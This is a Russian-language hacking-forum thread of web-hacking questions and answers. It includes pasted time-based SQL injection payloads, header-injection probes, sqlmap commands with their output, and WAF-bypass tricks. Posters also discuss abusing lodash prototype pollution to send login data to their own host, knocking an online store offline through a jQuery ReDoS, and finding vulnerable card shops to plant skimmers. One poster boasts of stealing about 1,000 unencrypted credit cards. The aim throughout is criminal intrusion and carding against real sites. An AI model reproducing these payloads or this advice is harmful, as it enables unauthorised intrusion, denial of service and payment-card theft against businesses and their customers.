• XSS.stack #1 – первый литературный журнал от юзеров форума

[web-hacking] Ваши вопросы

Руками надо чекать и искать где именно инъекция. Возможно она не в гет-запросе, а в одном из хидеров.
спс. в этой целе бурп понаходил еще кучу скуль . но там при любой из них вот что происходит при работе мапа
[05:26:36] [CRITICAL] page not found (404)
it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] n
[05:26:38] [INFO] testing if the target URL content is stable
[05:26:39] [DEBUG] page not found (404)


GET /bulk-ethernet-cable/1'"1000 HTTP/1.1
User-Agent: 1'"2000
referer: 1'"3000
client-ip: 1'"4000
x-forwarded-for: 1'"5000
accept-language: 1'"6000
via: 1'"7000
 
спс. в этой целе бурп понаходил еще кучу скуль . но там при любой из них вот что происходит при работе мапа
[05:26:36] [CRITICAL] page not found (404)
it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] n
[05:26:38] [INFO] testing if the target URL content is stable
[05:26:39] [DEBUG] page not found (404)


GET /bulk-ethernet-cable/1'"1000 HTTP/1.1
User-Agent: 1'"2000
referer: 1'"3000
client-ip: 1'"4000
x-forwarded-for: 1'"5000
accept-language: 1'"6000
via: 1'"7000
Чекни какой waf, и подберай тамперы.
 
спс. в этой целе бурп понаходил еще кучу скуль . но там при любой из них вот что происходит при работе мапа
[05:26:36] [CRITICAL] page not found (404)
it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n] n
[05:26:38] [INFO] testing if the target URL content is stable
[05:26:39] [DEBUG] page not found (404)


GET /bulk-ethernet-cable/1'"1000 HTTP/1.1
User-Agent: 1'"2000
referer: 1'"3000
client-ip: 1'"4000
x-forwarded-for: 1'"5000
accept-language: 1'"6000
via: 1'"7000
Валидный запрос с нормальными хидерами на любой странице руками протестируй в любом билдере, подставляя кавычки поочередно в каждый хидер и смотри на каком моменте вылезет ошибка СУБД. После этого инжектируй нужный хидер в скульмапе.
 
спс всем за ответы,
подскажите как тут составить парльно запрос с командами

Netsparker

GET /product_id=130027%20%2b%20((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A))%2f*%27XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%27%7c%22XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%22*%2f%20%2f*%20498607ab-ed98-4eb2-8dda-6ecb053c1806%20*%2f HTTP/1.1
Host: site.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: _gat=1; _ga=GA1.2.1142136944.1669307868; _gid=GA1.2.416229552.1669307868
Referer: https://site.com/sitemap.xml
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
 
И еще ребята, подскажите может на этом форуме, статьи по обходу , ну или какие тамперы почаще проскакивают у вас под этот WAF
Mod Security (OWASP CSR)
Open Source Web Application Firewall (Modsecurity)
Буду очень благодарен!Заранее спасибо !
 
И еще ребята, подскажите может на этом форуме, статьи по обходу , ну или какие тамперы почаще проскакивают у вас под этот WAF
Mod Security (OWASP CSR)
Open Source Web Application Firewall (Modsecurity)
Буду очень благодарен!Заранее спасибо !
Инструмент есть хороший WhatWaf зовут.
Возможно поможет. Чекает waf, предлогает решения.
 
Инструмент есть хороший WhatWaf зовут.
Возможно поможет. Чекает waf, предлогает решения
так я им и чекаю
[06:41:24][INFO] request type: GET
[06:41:24][INFO] gathering HTTP responses
[06:41:45][INFO] gathering normal response to compare against
[06:41:46][INFO] loading firewall detection scripts
[06:41:46][INFO] running firewall detection checks
[06:41:51][FIREWALL] Mod Security (OWASP CSR)
[06:41:51][FIREWALL] Open Source Web Application Firewall (Modsecurity)
[06:41:51][INFO] starting bypass analysis
[06:41:51][INFO] loading payload tampering scripts
[06:41:51][INFO] running tampering bypass checks
[06:45:20][WARN] no valid bypasses discovered with provided payloads
[06:45:20][INFO] URL has been cached for future use
[06:45:20][INFO] Skipping mining procedure

┌──(root㉿kali)-[~/whatwaf]
 
помогите пожалуйста , мучаю скулю уже несколько дней, не могу вывести бд , whatwaf ничего не детектит
вот скуля
__________________________________________________________________________
GET /index.php?product_id=130685%20%2b%20((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A))%2f*%27XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%27%7c%22XOR(((SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)))OR%22*%2f%20%2f*%20e9145b6a-ba3c-4c8c-9430-a24ed0ea8c12%20*%2f&route=product/product HTTP/1.1
Host: site.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: _ga=GA1.2.1817641526.1669566628; _gat=1; _gid=GA1.2.1635888973.1669566628
Referer: https://site.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36

через -r тоже без результатно

вот через команду нетспаркера с добавлением полной скули что то выходит но без результано тоже

sqlmap -u "https://site.com/index.php?product_...8c-9430-a24ed0ea8c12 */&route=product/product" -p "product_id" --risk="3" --level="5" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36" --cookie="_ga=GA1.2.1817641526.1669566628; _gat=1; _gid=GA1.2.1635888973.1669566628" --headers="Host:site.com\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nReferer:https://site.com/" --dbms="MySQL" --dbs

_____________________________________________________________________________________________________________________
there were multiple injection points, please select the one to use for following injections:
[0] place: URI, parameter: #1*, type: Single quoted string (default)
[1] place: URI, parameter: #2*, type: Single quoted string
[2] place: URI, parameter: #3*, type: Unescaped numeric
[q] Quit
> 2
[03:13:44] [INFO] testing MySQL
[03:13:44] [INFO] confirming MySQL
[03:13:44] [INFO] the back-end DBMS is MySQL
web server operating system: Linux
web application technology: Nginx, Plesk, PHP
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[03:13:44] [INFO] fetching database names
[03:13:44] [INFO] fetching number of databases
[03:13:44] [WARNING] time-based comparison requires larger statistical model, please wait.............................. (done)
[03:14:02] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[03:14:03] [INFO] retrieved:
[03:14:03] [ERROR] unable to retrieve the number of databases
[03:14:03] [INFO] falling back to current database
[03:14:03] [INFO] fetching current database
[03:14:06] [INFO] retrieved:
[03:14:06] [CRITICAL] unable to retrieve the database names
 
Нашел в сети готовый образ ПО для веба VMH0T3P от небезизвестного Dr.FarFar
Может кто в курсе он был замечен что его софт стучит автору ?
использую его софты, вроде ничего не пропадало) если ты про это
 
Каким образом можно раскрутить lodash prototype pollution и command injection?
Command injection выполняет по сути все тоже самое, что бы выполнялось, вводи я это просто в консоль браузера (то бишь на клиенте, но зато могу ему алерт вызвать)
Prototype pollution выглядит интересней, т.к. Object по сути является родителем вообще всех обьектов.
Т.е. правильно я понял, если я модифицирую свойство родителя, например Object.src="мой малварь хост" то все объекты будут ссылаться туда?
Т.е. в целом если постараться и правильно закинуть, я могу повесить на элемент логина эту х#йню (типа что при нажатии на кнопку вызываемое действие вообще отправляет данные мне?, а я в свою очередь, делаю прокси (вот тут нужно понять, как это сделать, но по-сути мне нужен просто сборщик data из post запроса), который посылает все запросы в одну сторону, а они в свою очередь редиректятся уже к самому клиенту? И сижу я mitm получается, собираю все данные клиентов, что мне летят
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Помогите раскрутить SQLI. сервер при редиректе берет из таблицы ссылку и Id сайта на который нас перенаправляют. Понял, что sql, так как получал 403 при 'select. Сделав 'se/**/lect+1+2 ошибку перестал получать, но sleep не работает. DB MySQL . В мапу не получается сунуть "unable to connect url"

GET /safe_link=93'+se/**/lect+sle/**/ep(100)++-+ HTTP/2
 
Помогите раскрутить SQLI. сервер при редиректе берет из таблицы ссылку и Id сайта на который нас перенаправляют. Понял, что sql, так как получал 403 при 'select. Сделав 'se/**/lect+1+2 ошибку перестал получать, но sleep не работает. DB MySQL . В мапу не получается сунуть "unable to connect url"

GET /safe_link=93'+se/**/lect+sle/**/ep(100)++-+ HTTP/2
ты 403 мог ловить если там аф или его подобие, которое тебе будет давать 403 вставляй ты куда угодно нагрузку.
Попробуй каким-нибудь фазером пройтись
Так ты хотя бы точку входа найдешь точней, а оттуда уже и байпасы подбирать можно.
 
Нашел cканером такую уязвимость на интернет магазине,вопрос как ее можно проэксплуатировать ?
Я так понимаю ,что нужно использовать эту cve и ей атаковать сайт ,ткните пжл почитать как и чем это можно сделать



Out-of-date Version (jQuery Validation)​


HIGH


Identified Version:1.19.3
Latest Version:1.19.5 (in this branch)
Vulnerability Database:Result is based on 11/29/2022 08:00:00 vulnerability database content.


jQuery Validation Other Vulnerability​


An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the jquery-validation npm package, when an attacker is able to supply arbitrary input to the url2 method

Affected Versions​


1.6.0 to 1.19.3

External References​



jQuery Validation Other Vulnerability​


The jQuery Validation Plugin (jquery-validation) provides drop-in validation for forms. Versions of jquery-validation prior to 1.19.5 are vulnerable to regular expression denial of service (ReDoS) when an attacker is able to supply arbitrary input to the url2 method. This is due to an incomplete fix for CVE-2021-43306. Users should upgrade to version 1.19.5 to receive a patch.



jQuery Validation Other Vulnerability​

The jQuery Validation Plugin (jquery-validation) provides drop-in validation for forms. Versions of jquery-validation prior to 1.19.5 are vulnerable to regular expression denial of service (ReDoS) when an attacker is able to supply arbitrary input to the url2 method. This is due to an incomplete fix for CVE-2021-43306. Users should upgrade to version 1.19.5 to receive a patch.



External References​


 
Нашел cканером такую уязвимость на интернет магазине,вопрос как ее можно проэксплуатировать ?
Я так понимаю ,что нужно использовать эту cve и ей атаковать сайт ,ткните пжл почитать как и чем это можно сделать



Out-of-date Version (jQuery Validation)​


HIGH


Identified Version:1.19.3
Latest Version:1.19.5 (in this branch)
Vulnerability Database:Result is based on 11/29/2022 08:00:00 vulnerability database content.


jQuery Validation Other Vulnerability​


An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the jquery-validation npm package, when an attacker is able to supply arbitrary input to the url2 method

Affected Versions​


1.6.0 to 1.19.3

External References​



jQuery Validation Other Vulnerability​


The jQuery Validation Plugin (jquery-validation) provides drop-in validation for forms. Versions of jquery-validation prior to 1.19.5 are vulnerable to regular expression denial of service (ReDoS) when an attacker is able to supply arbitrary input to the url2 method. This is due to an incomplete fix for CVE-2021-43306. Users should upgrade to version 1.19.5 to receive a patch.



jQuery Validation Other Vulnerability​

The jQuery Validation Plugin (jquery-validation) provides drop-in validation for forms. Versions of jquery-validation prior to 1.19.5 are vulnerable to regular expression denial of service (ReDoS) when an attacker is able to supply arbitrary input to the url2 method. This is due to an incomplete fix for CVE-2021-43306. Users should upgrade to version 1.19.5 to receive a patch.



External References​


Cудя по всему ты можешь в отказ вывести сервис с помощью этой херни.
Тебе нужно посмотреть по сорсам что загружаются (тут уже как сам собираешь js файлы, кравлишь или просто что на поверхности лежит), где используется метод url2, и где он принимает вход.
В том месте, где он принимает вход, нужно обойти регулярку (в гите по сути есть, каким образом, прям в коммите), засунув туда свое небически сложное для обработчика значение, что бы он упал и умер.
От dos до rce можно дойти, но уже сложней.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Насколько трудно найти дырявый шоп с картами с помощью сканеров уязвимостей что бы повесить на него снифак?
Найти я думаю не трудно, я видел кучу таких сайтов, с устаревшими CMS, с плагинами которые уже давно известны. Но все сводится к тому что такие сайты не лабы, отличаются сильно и все зависит от скилла и опыта
ты 403 мог ловить если там аф или его подобие, которое тебе будет давать 403 вставляй ты куда угодно нагрузку.
Попробуй каким-нибудь фазером пройтись
Так ты хотя бы точку входа найдешь точней, а оттуда уже и байпасы подбирать можно.
Полезная статья. Есть похожая про параметры в post запросах?
 
Найти я думаю не трудно, я видел кучу таких сайтов, с устаревшими CMS, с плагинами которые уже давно известны. Но все сводится к тому что такие сайты не лабы, отличаются сильно и все зависит от скилла и опыта
А транзы на таких сайтах вообще есть? А так то очень хорошо и интересно что много шопов которые можно ломануть... а то меня тут напугали что за 3 месяца нихрена не насканили дырок, только время потратили, хотя возможно это просто специально так сказали что бы я не лез в тему))) но другие ведь хакают как то! Чем я то хуже? ... Добывать карты это моя мечта, причём был уже опыт... ломанул как то базу без цвв на 1к кредиток... они были даже не зашифрованы... Спасибо за ответ кстати.

UPD:

А какой сканер уязвимостей лучше всего юзать?
 
Последнее редактирование:


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх